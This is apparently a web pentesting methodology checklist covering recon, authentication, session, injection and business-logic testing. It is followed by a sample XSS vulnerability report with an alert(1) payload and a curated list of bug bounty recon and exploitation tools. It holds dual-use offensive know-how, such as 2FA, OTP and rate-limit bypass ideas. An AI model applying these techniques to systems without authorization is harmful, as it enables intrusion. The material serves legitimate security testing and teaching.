  Enumerating Web Server’s Applications

  • Enumerating with Nmap
  • Enumerating with Netcat
  • Perform a DNS lookup
  • Perform a Reverse DNS lookup

  Review The Web Contents

  • Inspect the page source for sensitive info
  • Try to find Sensitive Javascript codes
  • Try to find any keys
  • Make sure the autocomplete is disabled

  Identifying Application’s Entry Points

  • Identify what the methods used are?
  • Identify where the methods used are?
  • Identify the Injection point

  Mapping Execution Paths

  • Use Burp Suite
  • Use Dirsearch
  • Use Gobuster

  Fingerprint Web Application Framework

  • Use the Wappalyzer browser extension
  • Use Whatweb
  • View URL extensions
  • View HTML source code
  • View the cookie parameter
  • View the HTTP headers

  Map Application Architecture

  • Map the overall site structure

• CONFIGURATION & DEPLOYMENT MANAGEMENT TESTING

  Test Network Configuration

  • Check the network configuration
  • Check for default settings
  • Check for default credentials

  Test Application Configuration

  • Ensure only required modules are used
  • Ensure unwanted modules are disabled
  • Ensure the server can handle DOS
  • Check how the application is handling 4xx & 5xx errors
  • Check for the privilege required to run
  • Check logs for sensitive info

  Test File Extension Handling

  • Ensure the server won’t return sensitive extensions
  • Ensure the server won’t accept malicious extensions
  • Test for file upload vulnerabilities

  Review Backup & Unreferenced Files

  • Ensure unreferenced files don’t contain any sensitive info
  • Ensure the namings of old and new backup files
  • Check the functionality of unreferenced pages

  Enumerate Infrastructure & Admin Interfaces

  • Try to find the Infrastructure Interface
  • Try to find the Admin Interface
  • Identify the hidden admin functionalities

  Testing HTTP Methods

  • Discover the supported methods
  • Ensure the PUT method is disabled
  • Ensure the OPTIONS method is disabled
  • Test access control bypass
  • Test for XST attacks
  • Test for HTTP method overriding

  Test HSTS

  • Ensure HSTS is enabled

  Test RIA Cross Domain Policy

  • Check for Adobe’s Cross Domain Policy
  • Ensure it has the least privilege

  Test File Permission

  • Ensure the permissions for sensitive files
  • Test for directory enumeration

  Test For Subdomain Takeover

  • Test DNS, A, and CNAME records for subdomain takeover
  • Test NS records for subdomain takeover
  • Test 404 response for subdomain takeover

  Test Cloud Storage

  • Check the sensitive paths of AWS
  • Check the sensitive paths of Google Cloud
  • Check the sensitive paths of Azure

• IDENTITY MANAGEMENT TESTING

  Test Role Definitions

  • Test for forced browsing
  • Test for IDOR (Insecure Direct Object Reference)
  • Test for parameter tampering
  • Ensure low privilege users can’t able to access high privilege resources

  Test User Registration Process

  • Ensure the same user or identity can’t register again and again
  • Ensure the registrations are verified
  • Ensure disposable email addresses are rejected
  • Check what proof is required for successful registration

  Test Account Provisioning Process

  • Check the verification for the provisioning process
  • Check the verification for the de-provisioning process
  • Check the provisioning rights for an admin user to other users
  • Check whether a user is able to de-provision themself or not?
  • Check for the resources of a de-provisioned user

  Testing For Account Enumeration

  • Check the response when a valid username and password entered
  • Check the response when a valid username and an invalid password entered
  • Check the response when an invalid username and password entered
  • Ensure the rate-limiting functionality is enabled in username and password fields

  Test For Weak Username Policy

  • Check the response for both valid and invalid usernames
  • Check for username enumeration

• AUTHENTICATION TESTING

  Test For Un-Encrypted Channel

  • Check for the HTTP login page
  • Check for the HTTP register or sign-in page
  • Check for HTTP forgot password page
  • Check for HTTP change password
  • Check for resources on HTTP after logout
  • Test for forced browsing to HTTP pages

  Test For Default Credentials

  • Test with default credentials
  • Test organization name as credentials
  • Test for response manipulation
  • Test for the default username and a blank password
  • Review the page source for credentials

  Test For Weak Lockout Mechanism

  • Ensure the account has been locked after 3-5 incorrect attempts
  • Ensure the system accepts only the valid CAPTCHA
  • Ensure the system rejects the invalid CAPTCHA
  • Ensure CAPTCHA code regenerated after reloaded
  • Ensure CAPTCHA reloads after entering the wrong code
  • Ensure the user has a recovery option for a lockout account

  Test For Bypassing Authentication Schema

  • Test forced browsing directly to the internal dashboard without login
  • Test for session ID prediction
  • Test for authentication parameter tampering
  • Test for SQL injection on the login page
  • Test to gain access with the help of session ID
  • Test multiple logins allowed or not?

  Test For Vulnerable Remember Password

  • Ensure that the stored password is encrypted
  • Ensure that the stored password is on the server-side

  Test For Browser Cache Weakness

  • Ensure proper cache-control is set on sensitive pages
  • Ensure no sensitive data is stored in the browser cache storage

  Test For Weak Password Policy

  • Ensure the password policy is set to strong
  • Check for password reusability
  • Check the user is prevented to use his username as a password
  • Check for the usage of common weak passwords
  • Check the minimum password length to be set
  • Check the maximum password length to be set

  Testing For Weak Security Questions

  • Check for the complexity of the questions
  • Check for brute-forcing

  Test For Weak Password Reset Function

  • Check what information is required to reset the password
  • Check for password reset function with HTTP
  • Test the randomness of the password reset tokens
  • Test the uniqueness of the password reset tokens
  • Test for rate limiting on password reset tokens
  • Ensure the token must expire after being used
  • Ensure the token must expire after not being used for a long time

  Test For Weak Password Change Function

  • Check if the old password asked to make a change
  • Check for the uniqueness of the forgotten password
  • Check for blank password change
  • Check for password change function with HTTP
  • Ensure the old password is not displayed after changed
  • Ensure the other sessions got destroyed after the password change

  Test For Weak Authentication In Alternative Channel

  • Test authentication on the desktop browsers
  • Test authentication on the mobile browsers
  • Test authentication in a different country
  • Test authentication in a different language
  • Test authentication on desktop applications
  • Test authentication on mobile applications

• AUTHORIZATION TESTING

  Testing Directory Traversal File Include

  • Identify the injection point on the URL
  • Test for Local File Inclusion
  • Test for Remote File Inclusion
  • Test Traversal on the URL parameter
  • Test Traversal on the cookie parameter

  Testing Traversal With Encoding

  • Test Traversal with Base64 encoding
  • Test Traversal with URL encoding
  • Test Traversal with ASCII encoding
  • Test Traversal with HTML encoding
  • Test Traversal with Hex encoding
  • Test Traversal with Binary encoding
  • Test Traversal with Octal encoding
  • Test Traversal with Gzip encoding

  Testing Travesal With Different OS Schemes

  • Test Traversal with Unix schemes
  • Test Traversal with Windows schemes
  • Test Traversal with Mac schemes

  Test Other Encoding Techniques

  • Test Traversal with Double encoding
  • Test Traversal with all characters encode
  • Test Traversal with only special characters encode

  Test Authorization Schema Bypass

  • Test for Horizontal authorization schema bypass
  • Test for Vertical authorization schema bypass
  • Test override the target with custom headers

  Test For Privilege Escalation

  • Identify the injection point
  • Test for bypassing the security measures
  • Test for forced browsing
  • Test for IDOR
  • Test for parameter tampering to high privileged user

  Test For Insecure Direct Object Reference

  • Test to change the ID parameter
  • Test to add parameters at the endpoints
  • Test for HTTP parameter pollution
  • Test by adding an extension at the end
  • Test with outdated API versions
  • Test by wrapping the ID with an array
  • Test by wrapping the ID with a JSON object
  • Test for JSON parameter pollution
  • Test by changing the case
  • Test for path traversal
  • Test by changing words
  • Test by changing methods

• SESSION MANAGEMENT TESTING

  Test For Session Management Schema

  • Ensure all Set-Cookie directives are secure
  • Ensure no cookie operation takes place over an unencrypted channel
  • Ensure the cookie can’t be forced over an unencrypted channel
  • Ensure the HTTPOnly flag is enabled
  • Check if any cookies are persistent
  • Check for session cookies and cookie expiration date/time
  • Check for session fixation
  • Check for concurrent login
  • Check for session after logout
  • Check for session after closing the browser
  • Try decoding cookies (Base64, Hex, URL, etc)

  Test For Cookie Attributes

  • Ensure the cookie must be set with the secure attribute
  • Ensure the cookie must be set with the path attribute
  • Ensure the cookie must have the HTTPOnly flag

  Test For Session Fixation

  • Ensure new cookies have been issued upon a successful authentication
  • Test manipulating the cookies

  Test For Exposed Session Variables

  • Test for encryption
  • Test for GET and POST vulnerabilities
  • Test if GET request incorporating the session ID used
  • Test by interchanging POST with GET method

  Test For Back Refresh Attack

  • Test after password change
  • Test after logout

  Test For Cross Site Request Forgery

  • Check if the token is validated on the server-side or not
  • Check if the token is validated for full or partial length
  • Check by comparing the CSRF tokens for multiple dummy accounts
  • Check CSRF by interchanging POST with GET method
  • Check CSRF by removing the CSRF token parameter
  • Check CSRF by removing the CSRF token and using a blank parameter
  • Check CSRF by using unused tokens
  • Check CSRF by replacing the CSRF token with its own values
  • Check CSRF by changing the content type to form-multipart
  • Check CSRF by changing or deleting some characters of the CSRF token
  • Check CSRF by changing the referrer to Referrer
  • Check CSRF by changing the host values
  • Check CSRF alongside clickjacking

  Test For Logout Functionality

  • Check the log out function on different pages
  • Check for the visibility of the logout button
  • Ensure after logout the session was ended
  • Ensure after logout we can’t able to access the dashboard by pressing the back button
  • Ensure proper session timeout has been set

  Test For Session Timeout

  • Ensure there is a session timeout exists
  • Ensure after the timeout, all of the tokens are destroyed

  Test For Session Puzzling

  • Identify all the session variables
  • Try to break the logical flow of the session generation

  Test For Session Hijacking

  • Test session hijacking on target that doesn’t has HSTS enabled
  • Test by login with the help of captured cookies

• INPUT VALIDATION TESTING

  Test For Reflected Cross Site Scripting

  • Ensure these characters are filtered <>’’&””
  • Test with a character escape sequence
  • Test by replacing < and > with HTML entities < and >
  • Test payload with both lower and upper case
  • Test to break firewall regex by new line /r/n
  • Test with double encoding
  • Test with recursive filters
  • Test injecting anchor tags without whitespace
  • Test by replacing whitespace with bullets
  • Test by changing HTTP methods

  Test For Stored Cross Site Scripting

  • Identify stored input parameters that will reflect on the client-side
  • Look for input parameters on the profile page
  • Look for input parameters on the shopping cart page
  • Look for input parameters on the file upload page
  • Look for input parameters on the settings page
  • Look for input parameters on the forum, comment page
  • Test uploading a file with XSS payload as its file name
  • Test with HTML tags

  Test For HTTP Parameter Pollution

  • Identify the backend server and parsing method used
  • Try to access the injection point
  • Try to bypass the input filters using HTTP Parameter Pollution

  Test For SQL Injection

  • Test SQL Injection on authentication forms
  • Test SQL Injection on the search bar
  • Test SQL Injection on editable characteristics
  • Try to find SQL keywords or entry point detections
  • Try to inject SQL queries
  • Use tools like SQLmap or Hackbar
  • Use Google dorks to find the SQL keywords
  • Try GET based SQL Injection
  • Try POST based SQL Injection
  • Try COOKIE based SQL Injection
  • Try HEADER based SQL Injection
  • Try SQL Injection with null bytes before the SQL query
  • Try SQL Injection with URL encoding
  • Try SQL Injection with both lower and upper cases
  • Try SQL Injection with SQL Tamper scripts
  • Try SQL Injection with SQL Time delay payloads
  • Try SQL Injection with SQL Conditional delays
  • Try SQL Injection with Boolean based SQL
  • Try SQL Injection with Time based SQL

  Test For LDAP Injection

  • Use LDAP search filters
  • Try LDAP Injection for access control bypass

  Testing For XML Injection

  • Check if the application is using XML for processing
  • Identify the XML Injection point by XML metacharacter
  • Construct XSS payload on top of XML

  Test For Server Side Includes

  • Use Google dorks to find the SSI
  • Construct RCE on top of SSI
  • Construct other injections on top of SSI
  • Test Injecting SSI on login pages, header fields, referrer, etc

  Test For XPATH Injection

  • Identify XPATH Injection point
  • Test for XPATH Injection

  Test For IMAP SMTP Injection

  • Identify IMAP SMTP Injection point
  • Understand the data flow
  • Understand the deployment structure of the system
  • Assess the injection impact

  Test For Local File Inclusion

  • Look for LFI keywords
  • Try to change the local path
  • Use the LFI payload list
  • Test LFI by adding a null byte at the end

  Test For Remote File Inclusion

  • Look for RFI keywords
  • Try to change the remote path
  • Use the RFI payload list

  Test For Command Injection

  • Identify the Injection points
  • Look for Command Injection keywords
  • Test Command Injection using different delimiters
  • Test Command Injection with payload list
  • Test Command Injection with different OS commands

  Test For Format String Injection

  • Identify the Injection points
  • Use different format parameters as payloads
  • Assess the injection impact

  Test For Host Header Injection

  • Test for HHI by changing the real Host parameter
  • Test for HHI by adding X-Forwarded Host parameter
  • Test for HHI by swapping the real Host and X-Forwarded Host parameter
  • Test for HHI by adding two Host parameters
  • Test for HHI by adding the target values in front of the original values
  • Test for HHI by adding the target with a slash after the original values
  • Test for HHI with other injections on the Host parameter
  • Test for HHI by password reset poisoning

  Test For Server Side Request Forgery

  • Look for SSRF keywords
  • Search for SSRF keywords only under the request header and body
  • Identify the Injection points
  • Test if the Injection points are exploitable
  • Assess the injection impact

  Test For Server Side Template Injection

  • Identify the Template injection vulnerability points
  • Identify the Templating engine
  • Use the tplmap to exploit

• ERROR HANDLING TESTING

  Test For Improper Error Handling

  • Identify the error output
  • Analyze the different outputs returned
  • Look for common error handling flaws
  • Test error handling by modifying the URL parameter
  • Test error handling by uploading unrecognized file formats
  • Test error handling by entering unrecognized inputs
  • Test error handling by making all possible errors

• WEAK CRYPTOGRAPHY TESTING

  Test For Weak Transport Layer Security

  • Test for DROWN weakness on SSLv2 protocol
  • Test for POODLE weakness on SSLv3 protocol
  • Test for BEAST weakness on TLSv1.0 protocol
  • Test for FREAK weakness on export cipher suites
  • Test for Null ciphers
  • Test for NOMORE weakness on RC4
  • Test for LUCKY 13 weakness on CBC mode ciphers
  • Test for CRIME weakness on TLS compression
  • Test for LOGJAM on DHE keys
  • Ensure the digital certificates should have at least 2048 bits of key length
  • Ensure the digital certificates should have at least SHA-256 signature algorithm
  • Ensure the digital certificates should not use MDF and SHA-1
  • Ensure the validity of the digital certificate
  • Ensure the minimum key length requirements
  • Look for weak cipher suites

• BUSINESS LOGIC TESTING

  Test For Business Logic

  • Identify the logic of how the application works
  • Identify the functionality of all the buttons
  • Test by changing the numerical values into high or negative values
  • Test by changing the quantity
  • Test by modifying the payments
  • Test for parameter tampering

  Test For Malicious File Upload

  • Test malicious file upload by uploading malicious files
  • Test malicious file upload by putting your IP address on the file name
  • Test malicious file upload by right to left override
  • Test malicious file upload by encoded file name
  • Test malicious file upload by XSS payload on the file name
  • Test malicious file upload by RCE payload on the file name
  • Test malicious file upload by LFI payload on the file name
  • Test malicious file upload by RFI payload on the file name
  • Test malicious file upload by SQL payload on the file name
  • Test malicious file upload by other injections on the file name
  • Test malicious file upload by Inserting the payload inside of an image by the bmp.pl tool
  • Test malicious file upload by uploading large files (leads to DOS)

• CLIENT SIDE TESTING

  Test For DOM Based Cross Site Scripting

  • Try to identify DOM sinks
  • Build payloads to that DOM sink type

  Test For URL Redirect

  • Look for URL redirect parameters
  • Test for URL redirection on domain parameters
  • Test for URL redirection by using a payload list
  • Test for URL redirection by using a whitelisted word at the end
  • Test for URL redirection by creating a new subdomain with the same as the target
  • Test for URL redirection by XSS
  • Test for URL redirection by profile URL flaw

  Test For Cross Origin Resource Sharing

  • Look for “Access-Control-Allow-Origin” on the response
  • Use the CORS HTML exploit code for further exploitation

  Test For Clickjacking

  • Ensure “X-Frame-Options” headers are enabled
  • Exploit with iframe HTML code for POC

• OTHER COMMON ISSUES

  Test For No-Rate Limiting

  • Ensure rate limiting is enabled
  • Try to bypass rate limiting by changing the case of the endpoints
  • Try to bypass rate limiting by adding / at the end of the URL
  • Try to bypass rate limiting by adding HTTP headers
  • Try to bypass rate limiting by adding HTTP headers twice
  • Try to bypass rate limiting by adding Origin headers
  • Try to bypass rate limiting by IP rotation
  • Try to bypass rate limiting by using null bytes at the end
  • Try to bypass rate limiting by using race conditions

  Test For EXIF Geodata

  • Ensure the website is striping the geodata
  • Test with EXIF checker

  Test For Broken Link Hijack

  • Ensure there is no broken links are there
  • Test broken links by using the blc tool

  Test For SPF

  • Ensure the website is having SPF record
  • Test SPF by nslookup command

  Test For Weak 2FA

  • Try to bypass 2FA by using poor session management
  • Try to bypass 2FA via the OAuth mechanism
  • Try to bypass 2FA via brute-forcing
  • Try to bypass 2FA via response manipulation
  • Try to bypass 2FA by using activation links to login
  • Try to bypass 2FA by using status code manipulation
  • Try to bypass 2FA by changing the email or password
  • Try to bypass 2FA by using a null or empty entry
  • Try to bypass 2FA by changing the boolean into false
  • Try to bypass 2FA by removing the 2FA parameter on the request

  Test For Weak OTP Implementation

  • Try to bypass OTP by entering the old OTP
  • Try to bypass OTP by brute-forcing
  • Try to bypass OTP by using a null or empty entry
  • Try to bypass OTP by response manipulation
  • Try to bypass OTP by status code manipulation

Things to mention in the report:

1. Vulnerability

2. Severity

3. Description

4. Instance

5. POC (proof of concept)

6. Steps to Reproduce

7. Impact

8. Mitigation

9. Reference

                               # Vulnerability Report

Vulnerability: Cross-Site Scripting (XSS)

Severity: High

Description

Cross-site scripting is a critical computer security vulnerability where an attacker attempts to execute malicious scripts in a web browser of the victim by injecting malicious code into a legitimate web page or web application.

Instance

• URL: www.xyz.com/deb/search?query=

• Payload:

  <script> alert(1); </script>
  
  

Proof of Concept

Screenshots of the browser page demonstrating the successful execution of the payload.

Steps to Reproduce

1. Go to www.xyz.com/deb/search?query=

2. Insert the payload in search box

3. Check the response

Impact

The XSS vulnerability poses a high risk, leading to potential:

• Open Redirection

• Session Hijack

• Phishing

• Defacement

• Cookie Stealing

Mitigation

• Input Validation

• Encoding

• Input Validation: Validate and sanitize user inputs to ensure they adhere to expected formats.
• Encoding: Encode output data to prevent malicious script execution.

Reference

OWASP/CVE/NVD link 🔗

Examples screenshot:

Awesome Bug Bounty Tools

A curated list of various bug bounty tools

Contents

• Recon

  • Subdomain Enumeration
  • Port Scanning
  • Screenshots
  • Technologies
  • Content Discovery
  • Links
  • Parameters
  • Fuzzing

• Exploitation

  • Command Injection
  • CORS Misconfiguration
  • CRLF Injection
  • CSRF Injection
  • Directory Traversal
  • File Inclusion
  • GraphQL Injection
  • Header Injection
  • Insecure Deserialization
  • Insecure Direct Object References
  • Open Redirect
  • Race Condition
  • Request Smuggling
  • Server Side Request Forgery
  • SQL Injection
  • XSS Injection
  • XXE Injection

• Miscellaneous

  • Passwords
  • Secrets
  • Git
  • Buckets
  • CMS
  • JSON Web Token
  • postMessage
  • Subdomain Takeover
  • Useful
  • Uncategorized

Recon

Subdomain Enumeration

• Sublist3r - Fast subdomains enumeration tool for penetration testers
• Amass - In-depth Attack Surface Mapping and Asset Discovery
• massdns - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)
• Findomain - The fastest and cross-platform subdomain enumerator, do not waste your time.
• Sudomy - Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting
• chaos-client - Go client to communicate with Chaos DNS API.
• domained - Multi Tool Subdomain Enumeration
• bugcrowd-levelup-subdomain-enumeration - This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference
• shuffledns - shuffleDNS is a wrapper around massdns written in go that allows you to enumerate valid subdomains using active bruteforce as well as resolve subdomains with wildcard handling and easy input-output…
• puredns - Fast domain resolver and subdomain bruteforcing with accurate wildcard filtering with wilcard(*)
• censys-subdomain-finder - Perform subdomain enumeration using the certificate transparency logs from Censys.
• Turbolist3r - Subdomain enumeration tool with analysis features for discovered domains
• censys-enumeration - A script to extract subdomains/emails for a given domain using SSL/TLS certificate dataset on Censys
• tugarecon - Fast subdomains enumeration tool for penetration testers.
• as3nt - Another Subdomain ENumeration Tool
• Subra - A Web-UI for subdomain enumeration (subfinder)
• Substr3am - Passive reconnaissance/enumeration of interesting targets by watching for SSL certificates being issued
• domain - enumall.py Setup script for Regon-ng
• altdns - Generates permutations, alterations and mutations of subdomains and then resolves them
• brutesubs - An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose
• dns-parallel-prober - his is a parallelised domain name prober to find as many subdomains of a given domain as fast as possible.
• dnscan - dnscan is a python wordlist-based DNS subdomain scanner.
• knock - Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.
• hakrevdns - Small, fast tool for performing reverse DNS lookups en masse.
• dnsx - Dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS queries of your choice with a list of user-supplied resolvers.
• subfinder - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites.
• assetfinder - Find domains and subdomains related to a given domain
• crtndstry - Yet another subdomain finder
• VHostScan - A virtual host scanner that performs reverse lookups
• scilla - Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration
• sub3suite - A research-grade suite of tools for subdomain enumeration, intelligence gathering and attack surface mapping.
• cero - Scrape domain names from SSL certificates of arbitrary hosts
• shosubgo - Small tool to Grab subdomains using Shodan api
• haktrails - Golang client for querying SecurityTrails API data
• bbot - A recursive internet scanner for hackers

Port Scanning

• masscan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
• RustScan - The Modern Port Scanner
• naabu - A fast port scanner written in go with focus on reliability and simplicity.
• nmap - Nmap - the Network Mapper. Github mirror of official SVN repository.
• sandmap - Nmap on steroids. Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles.
• ScanCannon - Combines the speed of masscan with the reliability and detailed enumeration of nmap

Screenshots

• EyeWitness - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
• aquatone - Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
• screenshoteer - Make website screenshots and mobile emulations from the command line.
• gowitness - gowitness - a golang, web screenshot utility using Chrome Headless
• WitnessMe - Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.
• eyeballer - Convolutional neural network for analyzing pentest screenshots
• scrying - A tool for collecting RDP, web and VNC screenshots all in one place
• Depix - Recovers passwords from pixelized screenshots
• httpscreenshot - HTTPScreenshot is a tool for grabbing screenshots and HTML of large numbers of websites.

Technologies

• wappalyzer - Identify technology on websites.
• webanalyze - Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning.
• python-builtwith - BuiltWith API client
• whatweb - Next generation web scanner
• retire.js - scanner detecting the use of JavaScript libraries with known vulnerabilities
• httpx - httpx is a fast and multi-purpose HTTP toolkit allows to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
• fingerprintx - fingerprintx is a standalone utility for service discovery on open ports that works well with other popular bug bounty command line tools.

Content Discovery

• gobuster - Directory/File, DNS and VHost busting tool written in Go
• recursebuster - rapid content discovery tool for recursively querying webservers, handy in pentesting and web application assessments
• feroxbuster - A fast, simple, recursive content discovery tool written in Rust.
• dirsearch - Web path scanner
• dirsearch - A Go implementation of dirsearch.
• filebuster - An extremely fast and flexible web fuzzer
• dirstalk - Modern alternative to dirbuster/dirb
• dirbuster-ng - dirbuster-ng is C CLI implementation of the Java dirbuster tool
• gospider - Gospider - Fast web spider written in Go
• hakrawler - Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
• crawley - fast, feature-rich unix-way web scraper/crawler written in Golang.
• katana - A next-generation crawling and spidering framework

Links

• LinkFinder - A python script that finds endpoints in JavaScript files
• JS-Scan - a .js scanner, built in php. designed to scrape urls and other info
• LinksDumper - Extract (links/possible endpoints) from responses & filter them via decoding/sorting
• GoLinkFinder - A fast and minimal JS endpoint extractor
• BurpJSLinkFinder - Burp Extension for a passive scanning JS files for endpoint links.
• urlgrab - A golang utility to spider through a website searching for additional links.
• waybackurls - Fetch all the URLs that the Wayback Machine knows about for a domain
• gau - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
• getJS - A tool to fastly get all javascript sources/files
• linx - Reveals invisible links within JavaScript files
• waymore - Find way more from the Wayback Machine!
• xnLinkFinder - A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

Parameters

• parameth - This tool can be used to brute discover GET and POST parameters
• param-miner - This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
• ParamPamPam - This tool for brute discover GET and POST parameters.
• Arjun - HTTP parameter discovery suite.
• ParamSpider - Mining parameters from dark corners of Web Archives.
• x8 - Hidden parameters discovery suite written in Rust.

Fuzzing

• wfuzz - Web application fuzzer
• ffuf - Fast web fuzzer written in Go
• fuzzdb - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
• IntruderPayloads - A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.
• fuzz.txt - Potentially dangerous files
• fuzzilli - A JavaScript Engine Fuzzer
• fuzzapi - Fuzzapi is a tool used for REST API pentesting and uses API_Fuzzer gem
• qsfuzz - qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.
• vaf - very advanced (web) fuzzer written in Nim.

Exploitation

Lorem ipsum dolor sit amet

Command Injection

• commix - Automated All-in-One OS command injection and exploitation tool.

CORS Misconfiguration

• Corsy - CORS Misconfiguration Scanner
• CORStest - A simple CORS misconfiguration scanner
• cors-scanner - A multi-threaded scanner that helps identify CORS flaws/misconfigurations
• CorsMe - Cross Origin Resource Sharing MisConfiguration Scanner

CRLF Injection

• CRLFsuite - A fast tool specially designed to scan CRLF injection
• crlfuzz - A fast tool to scan CRLF vulnerability written in Go
• CRLF-Injection-Scanner - Command line tool for testing CRLF injection on a list of domains.
• Injectus - CRLF and open redirect fuzzer

CSRF Injection

• XSRFProbe -The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.

Directory Traversal

• dotdotpwn - DotDotPwn - The Directory Traversal Fuzzer
• FDsploit - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
• off-by-slash - Burp extension to detect alias traversal via NGINX misconfiguration at scale.
• liffier - tired of manually add dot-dot-slash to your possible path traversal? this short snippet will increment ../ on the URL.

File Inclusion

• liffy - Local file inclusion exploitation tool
• Burp-LFI-tests - Fuzzing for LFI using Burpsuite
• LFI-Enum - Scripts to execute enumeration via LFI
• LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
• LFI-files - Wordlist to bruteforce for LFI

GraphQL Injection

• inql - InQL - A Burp Extension for GraphQL Security Testing
• GraphQLmap - GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.
• shapeshifter - GraphQL security testing tool
• graphql_beautifier - Burp Suite extension to help make Graphql request more readable
• clairvoyance - Obtain GraphQL API schema despite disabled introspection!

Header Injection

• headi - Customisable and automated HTTP header injection.

Insecure Deserialization

• ysoserial - A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
• GadgetProbe - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.
• ysoserial.net - Deserialization payload generator for a variety of .NET formatters
• phpggc - PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.

Insecure Direct Object References

• Autorize - Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily

Open Redirect

• Oralyzer - Open Redirection Analyzer
• Injectus - CRLF and open redirect fuzzer
• dom-red - Small script to check a list of domains against open redirect vulnerability
• OpenRedireX - A Fuzzer for OpenRedirect issues

Race Condition

• razzer - A Kernel fuzzer focusing on race bugs
• racepwn - Race Condition framework
• requests-racer - Small Python library that makes it easy to exploit race conditions in web apps with Requests.
• turbo-intruder - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
• race-the-web - Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.

Request Smuggling

• http-request-smuggling - HTTP Request Smuggling Detection Tool
• smuggler - Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
• h2csmuggler - HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
• tiscripts - These scripts I use to create Request Smuggling Desync payloads for CLTE and TECL style attacks.

Server Side Request Forgery

• SSRFmap - Automatic SSRF fuzzer and exploitation tool
• Gopherus - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
• ground-control - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
• SSRFire - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
• httprebind - Automatic tool for DNS rebinding-based SSRF attacks
• ssrf-sheriff - A simple SSRF-testing sheriff written in Go
• B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF
• extended-ssrf-search - Smart ssrf scanner using different methods like parameter brute forcing in post and get...
• gaussrf - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl and Filter Urls With OpenRedirection or SSRF Parameters.
• ssrfDetector - Server-side request forgery detector
• grafana-ssrf - Authenticated SSRF in Grafana
• sentrySSRF - Tool to searching sentry config on page or in javascript files and check blind SSRF
• lorsrf - Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods
• singularity - A DNS rebinding attack framework.
• whonow - A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53)
• dns-rebind-toolkit - A front-end JavaScript toolkit for creating DNS rebinding attacks.
• dref - DNS Rebinding Exploitation Framework
• rbndr - Simple DNS Rebinding Service
• httprebind - Automatic tool for DNS rebinding-based SSRF attacks
• dnsFookup - DNS rebinding toolkit
• surf - Escalate your SSRF vulnerabilities on Modern Cloud Environments. surf allows you to filter a list of hosts, returning a list of viable SSRF candidates.

SQL Injection

• sqlmap - Automatic SQL injection and database takeover tool
• NoSQLMap - Automated NoSQL database enumeration and web application exploitation tool.
• SQLiScanner - Automatic SQL injection with Charles and sqlmap api
• SleuthQL - Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap.
• mssqlproxy - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse
• sqli-hunter - SQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API wrapper that makes digging SQLi easy.
• waybackSqliScanner - Gather urls from wayback machine then test each GET parameter for sql injection.
• ESC - Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features.
• mssqli-duet - SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing
• burp-to-sqlmap - Performing SQLInjection test on Burp Suite Bulk Requests using SQLMap
• BurpSQLTruncSanner - Messy BurpSuite plugin for SQL Truncation vulnerabilities.
• andor - Blind SQL Injection Tool with Golang
• Blinder - A python library to automate time-based blind SQL injection
• sqliv - massive SQL injection vulnerability scanner
• nosqli - NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.
• ghauri - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws

XSS Injection

• XSStrike - Most advanced XSS scanner.
• xssor2 - XSS'OR - Hack with JavaScript.
• xsscrapy - XSS spider - 66/66 wavsep XSS detected
• sleepy-puppy - Sleepy Puppy XSS Payload Management Framework
• ezXSS - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
